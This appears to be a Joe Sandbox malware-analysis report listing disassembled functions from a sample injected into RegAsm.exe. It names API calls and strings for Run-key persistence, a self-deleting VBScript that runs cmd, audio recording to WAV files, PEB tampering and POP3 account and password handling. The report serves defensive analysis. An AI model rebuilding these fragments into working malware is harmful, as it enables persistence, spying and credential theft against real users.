Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Delete$Object$CreateGlobal$AllocCompatibleFreeIconInfo$BitmapBitsCursorDisplayDrawEnumLocalSelectSettingsStretch
String ID: DISPLAY
API String ID: 4256916514-865373369
Opcode ID: 86b0354fb495a99297697fe6ef04b294736cc3efcbebce0c6d492a8aa7b6887a
Instruction ID: c224b28d618b709f2792c20de920cdabb9de4a917dc726d0ffe82d87ba3e906a
Opcode Fuzzy Hash: 86b0354fb495a99297697fe6ef04b294736cc3efcbebce0c6d492a8aa7b6887a
Instruction Fuzzy Hash: 75C14C71508301AFD720DF25DC44BABBBE9EB88715F00482EF98993291DB74ED45CB6A

Function 0040D420 Relevance: 45.8, APIs: 6, Strings: 20, Instructions: 282registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00412850: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F8C8), ref: 00412860
Part of subcall function 00412850: WaitForSingleObject.KERNEL32(000000FF), ref: 00412873

GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,00000000), ref: 0040D51D
RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D530
SetFileAttributesW.KERNEL32(?,00000080,?,?,00000000), ref: 0040D549
SetFileAttributesW.KERNEL32(00000000,00000080,?,?,00000000), ref: 0040D579

Part of subcall function 0040B8AC: TerminateThread.KERNEL32(0040A27D,00000000,004752F0,pth_unenc,0040D0B8,004752D8,004752F0,?,pth_unenc), ref: 0040B8BB
Part of subcall function 0040B8AC: UnhookWindowsHookEx.USER32 ref: 0040B8C7
Part of subcall function 0040B8AC: TerminateThread.KERNEL32(Function_0000A267,00000000,?,pth_unenc), ref: 0040B8D5

Part of subcall function 0041C3F1: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0041C430

ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000000), ref: 0040D7C4
ExitProcess.KERNEL32 ref: 0040D7D0

Strings

"), xrefs: 0040D5D5
fso.DeleteFolder ", xrefs: 0040D6AB
fso.DeleteFile ", xrefs: 0040D63A
8SG, xrefs: 0040D4CF
Set fso = CreateObject("Scripting.FileSystemObject"), xrefs: 0040D5AA
dMG, xrefs: 0040D45B
wend, xrefs: 0040D689
open, xrefs: 0040D7BE
\update.vbs, xrefs: 0040D57B
Temp, xrefs: 0040D580
CreateObject("WScript.Shell").Run "cmd /c "", xrefs: 0040D701
exepath, xrefs: 0040D4F7
0qF, xrefs: 0040D78C, 0040D797
fso.DeleteFile(Wscript.ScriptFullName), xrefs: 0040D773
On Error Resume Next, xrefs: 0040D5B9
0qF, xrefs: 0040D737, 0040D778, 0040D661, 0040D68E
""", 0, xrefs: 0040D6E7
while fso.FileExists(", xrefs: 0040D5EC
Software\Microsoft\Windows\CurrentVersion\Run\, xrefs: 0040D471
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 0040D4C2

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
String ID: """, 0$")$0qF$0qF$8SG$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
API String ID: 1861856835-332907002
Opcode ID: d1e5175430559d744f3697ac5d4fa8fe9ed39947549674ebcac5be490dbfcb53
Instruction ID: f0dedf37b1d13a6a68a2ae87fd6fc042f686ba0b246118386f774540a9e6bc24
Opcode Fuzzy Hash: d1e5175430559d744f3697ac5d4fa8fe9ed39947549674ebcac5be490dbfcb53
Instruction Fuzzy Hash: 2191A4716082005AC315FB62D8529AFB7A9AF91309F10443FB14AA71E3FF7C9D49C65E

Function 0040D096 Relevance: 42.3, APIs: 6, Strings: 18, Instructions: 260registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00412850: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F8C8), ref: 00412860
Part of subcall function 00412850: WaitForSingleObject.KERNEL32(000000FF), ref: 00412873

GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1A5
RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D1B8
SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1E8
SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1F7

Part of subcall function 0040B8AC: TerminateThread.KERNEL32(0040A27D,00000000,004752F0,pth_unenc,0040D0B8,004752D8,004752F0,?,pth_unenc), ref: 0040B8BB
Part of subcall function 0040B8AC: UnhookWindowsHookEx.USER32 ref: 0040B8C7
Part of subcall function 0040B8AC: TerminateThread.KERNEL32(Function_0000A267,00000000,?,pth_unenc), ref: 0040B8D5

Part of subcall function 0041B978: GetCurrentProcessId.KERNEL32(00000000,63AC1986,00000000,?,?,?,?,00466468,0040D20D,.vbs,?,?,?,?,?,004752F0), ref: 0041B99F

ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000000), ref: 0040D412
ExitProcess.KERNEL32 ref: 0040D419

Strings

"), xrefs: 0040D2B1
fso.DeleteFolder ", xrefs: 0040D38A
fso.DeleteFile ", xrefs: 0040D315
hpF, xrefs: 0040D38F
Set fso = CreateObject("Scripting.FileSystemObject"), xrefs: 0040D285
pth_unenc, xrefs: 0040D09C
wend, xrefs: 0040D364
open, xrefs: 0040D40C
Temp, xrefs: 0040D246
8SG, xrefs: 0040D15E
exepath, xrefs: 0040D181
fso.DeleteFile(Wscript.ScriptFullName), xrefs: 0040D3C1
On Error Resume Next, xrefs: 0040D294
.vbs, xrefs: 0040D201
dMG, xrefs: 0040D0D1
while fso.FileExists(", xrefs: 0040D2C8
Software\Microsoft\Windows\CurrentVersion\Run\, xrefs: 0040D0E7
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 0040D138

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
String ID: ")$.vbs$8SG$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$hpF$open$pth_unenc$wend$while fso.FileExists("
API String ID: 3797177996-2557013105
Opcode ID: 6f7c707475e127e0f0984543e97620b4272e3932a2f9fe4e694b6d7d0f6a37c1
Instruction ID: d7bb7cf55c4450259501d0c3086a2d123ad94ece798773e978a9ab54bd012bbb
Opcode Fuzzy Hash: 6f7c707475e127e0f0984543e97620b4272e3932a2f9fe4e694b6d7d0f6a37c1
Instruction Fuzzy Hash: 9081B0716082005BC715FB62D8529AF77A8AFD1308F10483FB586A71E2EF7C9E49C65E

Function 00412475 Relevance: 42.2, APIs: 17, Strings: 7, Instructions: 190synchronizationsleepfileCOMMON

Download Yara Rule

APIs

CreateMutexA.KERNEL32(00000000,00000001,00000000,00000000,8.v,00000003), ref: 00412494
ExitProcess.KERNEL32(00000000), ref: 004124A0
CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0041251A
OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00412529
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00412534
CloseHandle.KERNEL32(00000000), ref: 0041253B
GetCurrentProcessId.KERNEL32 ref: 00412541
PathFileExistsW.SHLWAPI(?), ref: 00412572
GetTempPathW.KERNEL32(00000104,?), ref: 004125D5
GetTempFileNameW.KERNEL32(?,temp_,00000000,?), ref: 004125EF
lstrcatW.KERNEL32 ref: 00412601

Part of subcall function 0041C3F1: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0041C430

ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 00412641
Sleep.KERNEL32(000001F4), ref: 00412682
OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00412697
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004126A2
CloseHandle.KERNEL32(00000000), ref: 004126A9
GetCurrentProcessId.KERNEL32 ref: 004126AF

Strings

.exe, xrefs: 004125F5
exepath, xrefs: 004124CC
temp_, xrefs: 004125E3
open, xrefs: 0041263B
8SG, xrefs: 004124A6
WDH, xrefs: 00412548, 004126B6
8.v, xrefs: 0041247F

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Process$File$Create$CloseCurrentHandleObjectOpenPathSingleTempWait$ExecuteExistsExitMutexNameShellSleeplstrcat
String ID: .exe$8.v$8SG$WDH$exepath$open$temp_
API String ID: 2649220323-3305028444
Opcode ID: 908bf4a0c636080116a95eb017d82998fcf2f5d0d03184f54df3d938f2d2222d
Instruction ID: 17e21f0bcac096b9b94ced5306d028ab2385f4d1d2402c2ee3c492442eb82615
Opcode Fuzzy Hash: 908bf4a0c636080116a95eb017d82998fcf2f5d0d03184f54df3d938f2d2222d
Instruction Fuzzy Hash: 4651B371A00315BBDB10ABA09C9AEFE336D9B04715F10406BF502E71D2EFBC8E85865D

Function 0041B047 Relevance: 40.4, APIs: 12, Strings: 11, Instructions: 180synchronizationCOMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 0041B13C
mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 0041B150
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,004660A4), ref: 0041B178
PathFileExistsW.SHLWAPI(00000000), ref: 0041B18E
mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 0041B1CF
mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041B1E7
mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 0041B1FC
SetEvent.KERNEL32 ref: 0041B219
WaitForSingleObject.KERNEL32(000001F4), ref: 0041B22A
CloseHandle.KERNEL32 ref: 0041B23A
mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 0041B25C
mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041B266

Strings

stop audio, xrefs: 0041B257
stopped, xrefs: 0041B202
open ", xrefs: 0041B0D0
pause audio, xrefs: 0041B1CA
" type , xrefs: 0041B0D5
status audio mode, xrefs: 0041B1F7
alias audio, xrefs: 0041B0B8
NG, xrefs: 0041B109, 0041B08B
play audio, xrefs: 0041B14B
close audio, xrefs: 0041B261
resume audio, xrefs: 0041B1E2

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped$NG
API String ID: 738084811-2094122233
Opcode ID: 9446444cf830fc6be835005bb32dda33b6c94807cab4868e8ff28011ff8f99e5
Instruction ID: fe650b41180b39ed17604f18bcb9a712e211fca36760164052b554565c231c06
Opcode Fuzzy Hash: 9446444cf830fc6be835005bb32dda33b6c94807cab4868e8ff28011ff8f99e5
Instruction Fuzzy Hash: 0351A3B12842056AD314B771DC96ABF379CDB84358F10043FB64A521E2EF788D48CA6E

Function 00401A6D Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 156fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9
WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401B03
WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401B13
WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401B23
WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401B33
WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401B43
WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B54
WriteFile.KERNEL32(00000000,00472AAA,00000002,00000000,00000000), ref: 00401B65
WriteFile.KERNEL32(00000000,00472AAC,00000004,00000000,00000000), ref: 00401B75
WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401B85
WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B96
WriteFile.KERNEL32(00000000,00472AB6,00000002,00000000,00000000), ref: 00401BA7
WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401BB7
WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401BC7

Strings

data, xrefs: 00401BB1
RIFF, xrefs: 00401AFD
WAVE, xrefs: 00401B1D
fmt , xrefs: 00401B2D

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: File$Write$Create
String ID: RIFF$WAVE$data$fmt
API String ID: 1602526932-4212202414
Opcode ID: 62b265300192e2cf3fc36ee1b19606fb2409bb2919511e1e0316a81c88f5e1bc
Instruction ID: 2ec91bc18be8700290cedec85ec8f66933089e8d2246bcc6fed4c3761e19f715
Opcode Fuzzy Hash: 62b265300192e2cf3fc36ee1b19606fb2409bb2919511e1e0316a81c88f5e1bc
Instruction Fuzzy Hash: EB414E72644308BAE210DA51DD86FBB7EECEB89B50F40441AF644D60C0D7A4E909DBB3

Function 00407270 Relevance: 35.1, APIs: 12, Strings: 8, Instructions: 62libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000001,0040764D,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000003,00407675,004752D8,004076CE), ref: 00407284
GetProcAddress.KERNEL32(00000000), ref: 0040728D
GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 004072A2
GetProcAddress.KERNEL32(00000000), ref: 004072A5
GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 004072B6
GetProcAddress.KERNEL32(00000000), ref: 004072B9
GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 004072CA
GetProcAddress.KERNEL32(00000000), ref: 004072CD
GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 004072DE
GetProcAddress.KERNEL32(00000000), ref: 004072E1
GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 004072F2
GetProcAddress.KERNEL32(00000000), ref: 004072F5

Strings

RtlInitUnicodeString, xrefs: 0040727E
RtlReleasePebLock, xrefs: 004072D8
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, xrefs: 00407271
RtlAcquirePebLock, xrefs: 004072C4
NtAllocateVirtualMemory, xrefs: 0040729C
ntdll.dll, xrefs: 00407278, 00407283, 004072A1, 004072B5, 004072C9, 004072DD, 004072F1
NtFreeVirtualMemory, xrefs: 004072B0
LdrEnumerateLoadedModules, xrefs: 004072EC

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProc
String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
API String ID: 1646373207-255920310
Opcode ID: 219bb9ae8fbeca959e8a3246f6ba2b5d667704a520b136de0cc32d122fe89174
Instruction ID: f839149ce94c73eee9bda0254407c114f4740b95dc73f4bc012c28e2a4ae17e7
Opcode Fuzzy Hash: 219bb9ae8fbeca959e8a3246f6ba2b5d667704a520b136de0cc32d122fe89174
Instruction Fuzzy Hash: 520171E0E4431676DB216F3A6C54D4B6F9C9E5125131A087BB409E2292FEBCE800CE6D

Function 1000173A Relevance: 30.0, APIs: 5, Strings: 12, Instructions: 210COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 10001855
_strlen.LIBCMT ref: 10001869
_strlen.LIBCMT ref: 1000188B
_strlen.LIBCMT ref: 100018AE
_strlen.LIBCMT ref: 100018C8

Strings

POP3, xrefs: 100017D9
word, xrefs: 100017EA
un, xrefs: 100017B6
Acco, xrefs: 1000177A
Pass, xrefs: 100017E3
t, xrefs: 100017BF
un, xrefs: 10001787
t, xrefs: 10001790
word, xrefs: 100017CD
Pass, xrefs: 100017C6
Acco, xrefs: 100017A7
POP3, xrefs: 1000179D

Memory Dump Source

Source File: 00000010.00000002.958379212.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000010.00000002.958369053.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.958379212.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_10000000_RegAsm.jbxd

Similarity

API ID: _strlen
String ID: Acco$Acco$POP3$POP3$Pass$Pass$t$t$un$un$word$word
API String ID: 4218353326-3023110444
Opcode ID: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
Instruction ID: bb93a2ec4ecc4c0c7ac40ef0fbf5621e946fdf476ba73097d2750e43d9e064ca
Opcode Fuzzy Hash: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
Instruction Fuzzy Hash: 69612475D04218ABFF11CBE4C851BDEB7F9EF45280F00409AE604A7299EF706A45CF96

Function 0040CDF9 Relevance: 30.0, APIs: 12, Strings: 5, Instructions: 203fileCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0040CE07
CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,8.v,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E), ref: 0040CE20
CopyFileW.KERNEL32 ref: 0040CED0
_wcslen.LIBCMT ref: 0040CEE6
CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 0040CF6E
CopyFileW.KERNEL32 ref: 0040CF84
SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040CFC3
_wcslen.LIBCMT ref: 0040CFC6
SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040CFDD
CloseHandle.KERNEL32 ref: 0040D02D
ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000001), ref: 0040D04B
ExitProcess.KERNEL32 ref: 0040D062

Strings

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, xrefs: 0040CE91, 0040CE96, 0040CEC9, 0040CF7E, 0040CF83, 0040CF8A, 0040CFEB
open, xrefs: 0040D044
del, xrefs: 0040CFF5
6, xrefs: 0040CEDA
8.v, xrefs: 0040CDFC

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: File$_wcslen$AttributesCopyCreateDirectory$CloseExecuteExitHandleProcessShell
String ID: 6$8.v$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$del$open
API String ID: 1579085052-3992971303
Opcode ID: d7471eb5d94e540b25e5ad0db1c062a60a0b3aa35b410e6b0353d865c5f111e4
Instruction ID: 6918cae47ac4af68ec004dabb58255b0e3542cbe00f5913d2fcd66cab837b2ae
Opcode Fuzzy Hash: d7471eb5d94e540b25e5ad0db1c062a60a0b3aa35b410e6b0353d865c5f111e4
Instruction Fuzzy Hash: CA51A620208302ABD605B7659C92A6F679D9F84719F10443FF609A62E3EFBC9D05866E

Function 0041C01B Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 139stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?), ref: 0041C036
_memcmp.LIBVCRUNTIME ref: 0041C04E
lstrlenW.KERNEL32(?), ref: 0041C067
FindFirstVolumeW.KERNEL32 ref: 0041C0A2
GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0041C0B5
QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 0041C0F9
lstrcmpW.KERNEL32(?,?), ref: 0041C114
FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 0041C12C
_wcslen.LIBCMT ref: 0041C13B
FindVolumeClose.KERNEL32 ref: 0041C15B
GetLastError.KERNEL32 ref: 0041C173
GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 0041C1A0
lstrcatW.KERNEL32 ref: 0041C1B9
lstrcpyW.KERNEL32(?,?), ref: 0041C1C8
GetLastError.KERNEL32 ref: 0041C1D0

Strings

?, xrefs: 0041C0CD

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
String ID: ?
API String ID: 3941738427-1684325040
Opcode ID: 8bb61c95002590c369f4a1d7d05134d86b2ad7932cc4dc2ebb1cdf4d201e776a
Instruction ID: a349862c8cee18361e8dc915c9858c0b302c9409c899df8dda18ff866c7f94c5
Opcode Fuzzy Hash: 8bb61c95002590c369f4a1d7d05134d86b2ad7932cc4dc2ebb1cdf4d201e776a
Instruction Fuzzy Hash: 8B416171584316EBD720DFA0DC889EB77ECAB49755F00092BF545C2261EB78C988CBDA

Function 100019B2 Relevance: 26.5, APIs: 11, Strings: 4, Instructions: 218COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 10001A2D
_strlen.LIBCMT ref: 10001A59
_strlen.LIBCMT ref: 10001A77
_strlen.LIBCMT ref: 10001AC0
_strlen.LIBCMT ref: 10001AD3
_strlen.LIBCMT ref: 10001AE0
_strlen.LIBCMT ref: 10001B24
_strlen.LIBCMT ref: 10001B44
_strlen.LIBCMT ref: 10001B67
_strlen.LIBCMT ref: 10001C14
_strlen.LIBCMT ref: 10001C37

Strings

%m$~, xrefs: 10001A1D
~F@7, xrefs: 10001A16
~dra, xrefs: 100019FD
Gon~, xrefs: 10001A07

Memory Dump Source

Source File: 00000010.00000002.958379212.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000010.00000002.958369053.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.958379212.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_10000000_RegAsm.jbxd

Similarity

API ID: _strlen
String ID: %m$~$Gon~$~F@7$~dra
API String ID: 4218353326-230879103
Opcode ID: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
Instruction ID: 2a57ee3bda34e0ca62253b4f9cdd28a92c7aa5ebcaa9e167bfd7dd38749d7a78
Opcode Fuzzy Hash: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
Instruction Fuzzy Hash: 9371F5B5D002685BEF11DBB49895BDF7BFCDB05280F104096E644D7246EB74EB85CBA0

Function 0044F42D Relevance: 24.4, APIs: 16, Instructions: 419COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0044F4BF
_free.LIBCMT ref: 0044F4E5
_free.LIBCMT ref: 0044F50E
_free.LIBCMT ref: 0044F546
_free.LIBCMT ref: 0044F577
_free.LIBCMT ref: 0044F5B8
SetEnvironmentVariableA.KERNEL32(00000000,00000000), ref: 0044F639
_free.LIBCMT ref: 0044F652
_free.LIBCMT ref: 0044F6FB
_free.LIBCMT ref: 0044F721
_free.LIBCMT ref: 0044F74A
_free.LIBCMT ref: 0044F77F
_free.LIBCMT ref: 0044F7B0
_free.LIBCMT ref: 0044F7F1
SetEnvironmentVariableW.KERNEL32(00000000,?,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044F876
_free.LIBCMT ref: 0044F88F

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: _free$EnvironmentVariable
String ID:
API String ID: 1464849758-0
Opcode ID: 12b2d8700cfafab1c51f31b0af1c60b5a90c67e430b3d12670f3d9796c815c4a
Instruction ID: f75d98bba309171a1893162bbba9979c566f834f65d54a181aa040c21db392b6
Opcode Fuzzy Hash: 12b2d8700cfafab1c51f31b0af1c60b5a90c67e430b3d12670f3d9796c815c4a
Instruction Fuzzy Hash: C4D13672D007006BFB20AF799D81A6B77A4EF01318F05427FE919A7382EB3D99058799

Function 0041C68F Relevance: 23.0, APIs: 6, Strings: 7, Instructions: 214registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 0041C6B1
RegEnumKeyExA.ADVAPI32 ref: 0041C6F5
RegCloseKey.ADVAPI32(?), ref: 0041C9BF

Strings

InstallLocation, xrefs: 0041C77C
Publisher, xrefs: 0041C751
UninstallString, xrefs: 0041C7A4
DisplayVersion, xrefs: 0041C768
Software\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 0041C6A7
DisplayName, xrefs: 0041C73C
InstallDate, xrefs: 0041C790

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CloseEnumOpen
String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
API String ID: 1332880857-3714951968
